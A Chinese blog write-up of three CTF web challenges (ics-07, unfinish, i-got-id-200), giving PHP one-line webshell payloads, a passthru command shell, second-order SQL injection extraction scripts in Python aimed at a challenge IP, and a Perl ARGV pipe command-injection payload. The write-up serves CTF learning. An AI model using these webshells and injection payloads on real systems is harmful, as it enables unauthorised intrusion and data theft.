攻防世界6分题目wp

最新推荐文章于 2022-10-30 21:48:14 发布
最新推荐文章于 2022-10-30 21:48:14 发布
阅读量386 收藏 1
点赞数
分类专栏: CTF技术 文章标签: web 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33942040/article/details/109136498
版权

攻防世界6分题目wp

一.ics-07

①利用一句话木马思路
题目提示–>存在解析漏洞(即典型)
考虑为构造payload的题目
然后根据提示来到页面处
在这里插入图片描述
查看源码

<html>
  <head>
    <meta charset="utf-8">
    <title>cetc7</title>
  </head>
  <body>
    <?php
    session_start();

    if (!isset($_GET[page])) {
      show_source(__FILE__);
      die();
    }

    if (isset($_GET[page]) && $_GET[page] != 'index.php') {
      include('flag.php');
    }else {
      header('Location: ?page=flag.php');
    }

    ?>

    <form action="#" method="get">
      page : <input type="text" name="page" value="">
      id : <input type="text" name="id" value="">
      <input type="submit" name="submit" value="submit">
    </form>
    <br />
    <a href="index.phps">view-source</a>

    <?php
     if ($_SESSION['admin']) {
       $con = $_POST['con'];
       $file = $_POST['file'];
       $filename = "backup/".$file;

       if(preg_match('/.+\.ph(p[3457]?|t|tml)$/i', $filename)){
          die("Bad file extension");
       }else{
            chdir('uploaded');
           $f = fopen($filename, 'w');
           fwrite($f, $con);
           fclose($f);
       }
     }
     ?>

    <?php
      if (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9') {
        include 'config.php';
        $id = mysql_real_escape_string($_GET[id]);
        $sql="select * from cetc007.user where id='$id'";
        $result = mysql_query($sql);
        $result = mysql_fetch_object($result);
      } else {
        $result = False;
        die();
      }

      if(!$result)die("<br >something wae wrong ! <br>");
      if($result){
        echo "id: ".$result->id."</br>";
        echo "name:".$result->user."</br>";
        $_SESSION['admin'] = True;
      }
     ?>

  </body>
</html>

分析后需要条件为

isset(KaTeX parse error: Expected 'EOF', got '&' at position 11: _GET[id]) &̲& floatval(_GET[id]) !== ‘1’ && substr($_GET[id], -1) === ‘9’
$_SESSION[‘admin’]==true

因此构造payload
GET请求的payload

index.php?page=flag.php&id=1-9

POST的payload

file=2.php/.&con=<?php @eval($_POST[apple])?>#写马入2.php文件下
#或者
con=<?php @eval($_POST['admin']);?>&file=../flag.php/.&Submit%21=Submit%21
#也可进行写马
file=2.php/.&con=<?php phpinfo();?>#查看phpinfo()页面

连接一句话木马

ip/uploaded/backup/2.php

即获取flag
在这里插入图片描述
②利用cat文件思路
构建exp

file=../123.php/1.php/..&con=<?php passthru($_GET[bash]);?>

–>利用的是bash方式进行传值
然后利用bash读取即可

uploaded/123.php?bash=cat ../flag.php

二.unfinish(二次注入)

①进入网站发现是login页面
在这里插入图片描述
因为题目提示是sql注入–>做了一些基础的测试
把sql的字符全跑了一遍和四类注入
发觉全爆的是用户或者密码错误
于是考虑注入点不在这里
于是打开了我心爱的AWVS
扫描后发觉
存在一个register且在username处存在注入点
在这里插入图片描述
推测这里的注册SQL语句是

insert into tables value('$email','$username','$passwpord');

于是进行对该处的username进行模糊测试
发觉典型的模糊测试包
只有两个没被过滤
在这里插入图片描述

进行尝试绕
1.尝试利用group_concat()语句进行闭合代返回database()

group_concat(1,database()),database','1')#

发觉被过滤掉了
2.尝试利用and运算进行绕

 1' and ' 0

3.insert注入

select ‘1’+‘1a’;#select ‘1’+‘1a’;-->结果2
select '0'+database();#-->
 
select '0'+ascii(substr(database(),1,1));#-->截取后进行ascii编码,会出现逗号被过滤
#即--> substr(str from 1 for 10) (表示截取str字符串的第1个到第10个字符)
select '0'+ascii(substr(database() from 1 for 1));#-->因此利用from ...for...进行替换,

典型替换
from 1 for 1 替换,
+替换–>空格 如and+1=1

4.形成payload

username=0'+(select substr(hex(hex((select * from flag))) from 1 for 10))+'0

原因:①使用前一个0’±->的原因控制闭合
后一个+'0是因为想控制显示精度状况–>即如果只用hex会导致查询不出来的状况特点
②使用两次hex()原因–>防止丢失字母的原因且使用hex是将database()转换为16进制–>实现绕掉过滤掉防止database()的状况

大佬脚本

import requests
import time
from bs4 import BeautifulSoup       #html解析器

def getDatabase():
    database = ''
    for i in range(10):
        data_database = {
            'username':"0'+ascii(substr((select database()) from "+str(i+1)+" for 1))+'0",
            'password':'admin',
            "email":"admin11@admin.com"+str(i)
        }
        #注册
        requests.post("http://220.249.52.133:57046/register.php",data_database)
        login_data={
            'password':'admin',
            "email":"admin11@admin.com"+str(i)
        }
        response=requests.post("http://220.249.52.133:57046/login.php",login_data)
        html=response.text                  #返回的页面
        soup=BeautifulSoup(html,'html.parser')
        getUsername=soup.find_all('span')[0]#获取用户名
        username=getUsername.text
        if int(username)==0:
            break
        database+=chr(int(username))
    return database

print(getDatabase())


def getTables():
    tables = ''
    for i in range(10):
        data_tables = {
            'username':"0'+ascii(substr((select tables()) from "+str(i+1)+" for 1))+'0",
            'password':'admin',
            "email":"admin12@admin.com"+str(i)
        }
        #注册
        requests.post("http://220.249.52.133:57046/register.php",data_tables)
        login_data={
            'password':'admin',
            "email":"admin12@admin.com"+str(i)
        }
        response=requests.post("http://220.249.52.133:57046/login.php",login_data)
        html=response.text                  #返回的页面
        soup=BeautifulSoup(html,'html.parser')
        getUsername=soup.find_all('span')[0]#获取用户名
        username=getUsername.text
        if int(username)==0:
            break
        tables+=chr(int(username))
    return tables
'''
print(getTables())
'''

def getFlag():
    flag = ''
    for i in range(40):
        data_flag = {
            'username':"0'+ascii(substr((select * from flag) from "+str(i+1)+" for 1))+'0",
            'password':'admin',
            "email":"admin32@admin.com"+str(i)
        }
        #注册
        requests.post("http://220.249.52.133:57046/register.php",data_flag)
        login_data={
            'password':'admin',
            "email":"admin32@admin.com"+str(i)
        }
        response=requests.post("http://220.249.52.133:57046/login.php",login_data)
        html=response.text                  #返回的页面
        soup=BeautifulSoup(html,'html.parser')
        getUsername=soup.find_all('span')[0]#获取用户名
        username=getUsername.text
        if int(username)==0:
            break
        flag+=chr(int(username))
    return flag

print(getFlag())

直接猜测flag在flag字段中写法

import requests
import re


register_url = 'http://220.249.52.133:40821/register.php'
login_url = 'http://220.249.52.133:40821/login.php'


for i in range(1, 100):
    register_data = {
        'email': '111@123.com%d' % i,
        'username': "0' + ascii(substr((select * from flag) from %d for 1)) + '0" % i,
        'password': 'admin'
    }
    res = requests.post(url=register_url, data=register_data)

    login_data = {
        'email': '111@123.com%d' % i,
        'password': 'admin'
    }
    res_ = requests.post(url=login_url, data=login_data)
    code = re.search(r'<span class="user-name">\s*(\d*)\s*</span>', res_.text)
    print(chr(int(code.group(1))), end='')

总结:

三,i-got-id-200

考点:
①对ARGV文件的利用
②param()函数–>利用
即传入一个ARGV文件–>则Perl会将传入的参数作为文件名传出

解题
①进入网站后发觉可上传文件,于是上传一句话木马
发觉被显示在了网页源码中

于是
猜测网站的模式


```perl use strict; use warnings; use CGI;
my $cgi= CGI->new; 
if ( $cgi->upload( 'file' ) ) 
{ my $file= $cgi->param( 'file' ); 
while ( <$file> ) 
{ print "$_"; 
} }

即考虑利用ARGV文件,从而实现perl将参数当作文件名读取的效果
利用方法–>构造ARVG文件流头
进行实现表示是文件形式的含义
在这里插入图片描述
利用方法–>读取文件目录的payload

?/bin/bash%20-c%20ls${IFS}/|
#-->即该命令
?/bin/bash -c ls${IFS}/|
#即通过管道的模式进行执行命令后将输出结果传输到读入流中

读取文件–>

/flag即可
goddemon
关注
专栏目录
攻防世界 supersqli 解题思路
xj28555的博客
07-14 1544
随便注,初步判断是有注入点的,那我们进入题目 提交一个1试一试 再在1的后面加个单引号试一试 报错了,然后我们判断有几个字段。 回车后正常,但是换成3后就报错了,所以有两个字段。 当我想用联合查询查询用户和数据库的时候 爆出一段正则表达式,发现过滤掉了图中的关键字。然后我寻找绕过点,发现了堆叠注入。 查询表 查询字段 发现flag,然后我们想办法读取flag值。因为select被正则表达式给过滤掉了,所以这里我们就要想一点骚姿势了。刚开始我想..
攻防世界】crypto解题wp
最新发布
yezhenfule的博客
11-24 1407
密码学写题记录
攻防世界Misc第六题(gif)
weixin_55756461的博客
04-14 274
攻防世界Misc第六题 1、打开该题,下载附件 2、打开附件发现有两个文件夹,一个是打不开的图片,另一个则是103张黑白图片 这个时候脑洞就得大一些,只有黑白两色,会不会就是代表二进制的01呢?我们试验一下。 方法一:一个一个对照写 ...
攻防世界6-10题
yxltx_的博客
11-12 403
第六题
攻防世界web题(supersqli)
qq_45791542的博客
08-12 202
读题 题目描述:随便注 提示我们这是一道注入题 解题步骤 提交个1试一下 再在1后面加个单引号试试1' 报错了,然后判断有几个字段
ics-07—CTF
qq_40646572的博客
04-16 2242
审题 打开链接地址显示如下: 点击项目管理链接,转到目标网页 发现页面有一个view-source按钮(一开始没发现可以点击,打开源代码的时候发现,这是一个链接地址。) view_source页面代码如下: 通过代码审计,发现session会话要有admin用户的信息,才可以进行文件上传的操作。 那么首先需要在session会话中获取admin用户的身份,通过下面的代码审计,发现可以利用id 这个参数。 admin身份绕过 首先看到此处的代码,想着能不能使用sql注入的方式绕过,sql注入没能成功.
攻防世界miss-01,杂项misc太湖杯
11-01
标题 "攻防世界miss-01,杂项misc太湖杯" 暗示这是一个网络安全相关的挑战,特别是关于“攻防世界”平台上的一个名为“miss_01”的问题,该问题类在“杂项”(misc)类别下,可能涉及多种技术技能。描述中提到的...
攻防世界】misc解题wp
yezhenfule的博客
10-30 1573
攻防世界答题记录
【pwn】攻防世界 pwn新手区wp
woodwhale的博客
08-10 7279
【pwn】攻防世界 pwn新手区wp 前言 这几天恶补pwn的各种知识点,然后看了看攻防世界的pwn新手区没有堆题(堆才刚刚开始看),所以就花了一晚上的时间把新手区的10题给写完了。 1、get_shell 送题,连接上去就是/bin/sh 不过不知道为啥我的nc连接不上。。。 还是用pwntool的remote连接的 from pwn import * io = remote("111.200.241.244", 64209) io.interactive() 2、hello pwn 可以看
攻防世界MISC新手练习区题目wp
星|Donstpast
05-12 4031
1.this_is_flag 一进去题目描述的例子很令人心动,直接提交例子的flag(有人说不能直接复制,由于我开了无视网页限制,,所以也不知道),之后正确 2.pdf 划重点(必定图片下面放着东西),之后我们下载好附件,发现是一个pdf文件,无法直接移开图片,此时有两个思路,(我用的是极速pdf)第一个是将它转换为word文档,不过我的有免费次数限制,,能不用就不用。这就到了第二个方法 选中照...
攻防世界——web高手进阶区题解
热门推荐
小锤队长的博客
10-01 2万+
目录 1,cat (Django,cURL漏洞) 2,ics-05(XCTF 4th-CyberEarth)(文件包含 + preg_replace函数漏洞) 3,ics-06(爆破id) 4,lottery(.git文件泄露) 5,NewsCenter(sql注入) 6,mfv(.git文件泄露 + php审计+ 命令执行) 7,Training-WWW-Robots(robo...
web攻防世界4
weixin_43741181的博客
10-21 234
upload1 查看源码发现JS判断 Array.prototype.contains = function (obj) { var i = this.length; while (i--) { if (this[i] === obj) { return true; } } ret...
攻防世界web高手区writeup
a370793934的专栏
11-27 1791
Cat django报错 ctrl+u查看源码,发现input name=url ?url=%79 发现有url转换,转换成w,在输入=%80(ascii码表第%80不存在)报错 Django使用的是gbk编码,超过%F7的编码不在gbk中有意义 当CURLOPT_SAFE_UPLOAD为 true 时,如果在请求前面加上@的话phpcurl组件是会把后面的当作绝对路径请求,来读...
详细解析Shell中的IFS变量
洛奇看世界
05-07 9554
题图:Photo by Jacob Postuma on Unsplash 本文原创发布于微信公众号“洛奇看世界”,一个大龄2b码农的世界 这里的Shell主要指bash,学习bash的前前后后在IFS变量上吃了不少苦头,虽然花了不少时间,也知道大概如何使用,但并没有深入理解。翻了几本Shell相关的书,对IFS也都是一带而过,并没有做详细的阐述(IFS本身在Shell里面就...
Linux - bash - 小坑: IFS
weixin_30784501的博客
09-08 474
1. 概述 for 循环读取文件内容时, 输出被打得稀碎 2. 场景 需求 读入文件 逐行显示 源文件 Continuous Delivery with Docker and Jenkins Jenkins 2 Up and Running Jenkins 2.x Continuous Integration Cookbook(3rd) Jenkins Fundamentals...
攻防世界 Misc高手进阶区 7题 challenge_how_many_Vigenère
闵行小鱼塘
02-02 1144
继续ctf的旅程,攻防世界Misc高手进阶区的7题,本篇是challenge_how_many_Vigenère的writeup
buuctf 刷题2(md5(true)参数漏洞&php字符串解析特性&php&dirsearch&php反序列化)
weixin_63231007的博客
05-02 2307
[BJDCTF2020]Easy MD5 1 burp抓包,发现传入的参数的语句为: Hint: select * from 'admin' where password=md5($pass,true) md5函数介绍为: md5( string , raw ) string : 规定需要计算的字符串 raw : 规定十六进制或二进制输出格式。 true:16字符二进制格式 false(默认): 32字符十六进制数 md5 true参数漏洞有 ff...
攻防世界刷题wp
weixin_47869330的博客
06-07 1777
攻防世界Cryptoflag in your hand告诉你个秘密工业协议析sherlockcr3-what-is-this-encryptionbanana-princessflag in gyour hand1Miscbase64stego Crypto flag in your hand 网页打开查看源码 ctrl+shift+i 即可打开控制台 每个减三转ascii码即可得到flag a = [118, 104, 102, 120, 117, 108, 119, 124, 48, 123, 101
shell中的特殊变量IFS
求人不如求己,思考才能进步!
07-22 2万+
当我越来越习惯python的编写风格时,我经常会想用bash去遍历一个文件的行,并将读取的行进行处理。 但一个诡异的情况,如果我的文本类似于这样 the first line. the second line. the third line. for line in `cat filename` do echo $line done  当我通过上面的方式遍历文件的每一行,我发现读
攻防世界序列化漏洞详解与利用
本篇内容主要聚焦于攻防世界平台中涉及的序列化问题,通过一道具体的题目来深入解析这一主题。 序列化是将对象的状态转换为可存储或传输的形式的过程,而反序列化则是相反的过程,即从序列化的数据恢复对象。在PHP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

goddemon

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值